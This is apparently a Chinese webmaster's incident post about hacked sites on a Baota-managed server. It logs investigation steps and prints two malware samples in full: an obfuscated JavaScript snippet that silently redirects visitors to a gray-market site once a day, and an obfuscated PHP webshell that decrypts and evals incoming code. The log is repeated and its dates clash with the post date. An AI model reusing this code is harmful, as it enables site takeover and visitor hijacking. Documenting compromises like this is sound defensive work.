网站被人植入木马,偷偷24小时跳转一次到黑产。
2025/02/23 12:54:40
网站被人偷偷植入了下面的木马,偷偷24小时跳转一次到黑产。
目前不太确定漏洞在哪里,文末公布排查记录。
===================================
最新排查记录:
2025.5.23 9:00 发现不止一个网站被植入,同一个服务器的多个网站被植入相同的代码,有没有可能是宝塔的漏洞或者是系统的漏洞?没有开通宝塔企业版,很多查杀功能用不了。
2025.5.23 10:00 宝塔面板里设置了open_basedir防止跨站攻击。这样说,webshell如果只修改了一个站,不可能所有站都能修改吧。
2025.5.23 10:20 发现这个ssh被攻击80多万次。如图:
2025.5.23 11:20 发现第一个木马。dh.xxxxxx.cn\files\upload/img_678dba4d31bb1.php 网站程序是采用六零导航页,文件植入时间2025.1.20 10:51。
目前不太确定漏洞在哪里,文末公布排查记录。
- (function(){ var _0xa1b2 = "aHR0cHM6Ly9hdi5ydW4="; // var _0xc3d4 = "cmVkaXJlY3RlZA=="; // var _0xd5e6 = "MjQ="; // 24小时 function _0xf7g8(_0x9h0i){ return atob(_0x9h0i); } // function _0xj1k2(_0xl3m, _0xn4o){ var _0xp5q = new Date(); _0xp5q.setTime(_0xp5q.getTime() + (_0xn4o * 60 * 60 * 1000)); document.cookie = _0xl3m + "=1;expires=" + _0xp5q.toUTCString() + ";path=/"; } function _0xr6s(_0xt7u){ var _0xv8w = document.cookie.match(new RegExp("(^| )" + _0xt7u + "=([^;]+)")); return _0xv8w ? _0xv8w[2] : null; } window.addEventListener("load", function() { var _0xurl = _0xf7g8(_0xa1b2); var _0xcookie = _0xf7g8(_0xc3d4); var _0xexpire = parseInt(_0xf7g8(_0xd5e6)); if (!_0xr6s(_0xcookie)) { _0xj1k2(_0xcookie, _0xexpire); eval("window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66'] = _0xurl;"); } });})();
===================================
最新排查记录:
2025.5.23 9:00 发现不止一个网站被植入,同一个服务器的多个网站被植入相同的代码,有没有可能是宝塔的漏洞或者是系统的漏洞?没有开通宝塔企业版,很多查杀功能用不了。
2025.5.23 10:00 宝塔面板里设置了open_basedir防止跨站攻击。这样说,webshell如果只修改了一个站,不可能所有站都能修改吧。
2025.5.23 10:20 发现这个ssh被攻击80多万次。如图:
2025.5.23 11:20 发现第一个木马。dh.xxxxxx.cn\files\upload/img_678dba4d31bb1.php 网站程序是采用六零导航页,文件植入时间2025.1.20 10:51。
- Hello Administrator!WelCome To Tas9er PHP Console!<?php@error_reporting(0);session_start(); $govIZJXkkPZ= base64_decode(base64_decode("TVRaaFkyRmpZekExWVdGbVlXWTI=")).chr(55); $_SESSION['k']=$govIZJXkkPZ; session_write_close(); $govPQ=base64_decode(base64_decode("YjJKMWFHRnZjbkJtTlhWM05EUmtkbTl4")); $govi7i1l1kf='openssl'; $gov8G=govQJI($govPQ); $gov7TSqOX2B5AkEwxD="file_g".chr(101)."t_"."con".base64_decode("dGVudHM="); $govaVW=$gov7TSqOX2B5AkEwxD($gov8G); if(!extension_loaded($govi7i1l1kf)) { $govc="base64_"."decode"; $govaVW=$govc("/*X]-DP@i*/".$govaVW); for($i=0;$i<strlen($govaVW);$i++) { } } $govaVW=openssl_decrypt($govaVW, base64_decode(base64_decode("UVVWVE1UST0=")).chr(56), $govIZJXkkPZ); $govH7fm2l8=explode('|',$govaVW); $govVai9X1uHnV9=$govH7fm2l8[1]; class govEFO{public function __invoke($p) {eval("/*X]-DP@i*/".$p."");}} @call_user_func(new govEFO(),$govVai9X1uHnV9); function govQJI($gov84T8xX){ $di15 = ''; $govlHpFcRK = (6434+30541)*intval(chr(48)); $gov0m2hSQpX = (1258-1818)*intval(chr(48)); for ($i = 0, $j = strlen($gov84T8xX); $i < $j; $i++){ $govlHpFcRK <<= 5; if ($gov84T8xX[$i] >= 'a' && $gov84T8xX[$i] <= 'z'){ $govlHpFcRK += (ord($gov84T8xX[$i]) - 97); } elseif ($gov84T8xX[$i] >= '2' && $gov84T8xX[$i] <= '7') { $govlHpFcRK += (24 + $gov84T8xX[$i]); } else { exit(1); } $gov0m2hSQpX += 5; while ($gov0m2hSQpX >= 8){ $gov0m2hSQpX -= 8; $di15 .= chr($govlHpFcRK >> $gov0m2hSQpX); $govlHpFcRK &= ((1 << $gov0m2hSQpX) - 1);}} return $di15;}?>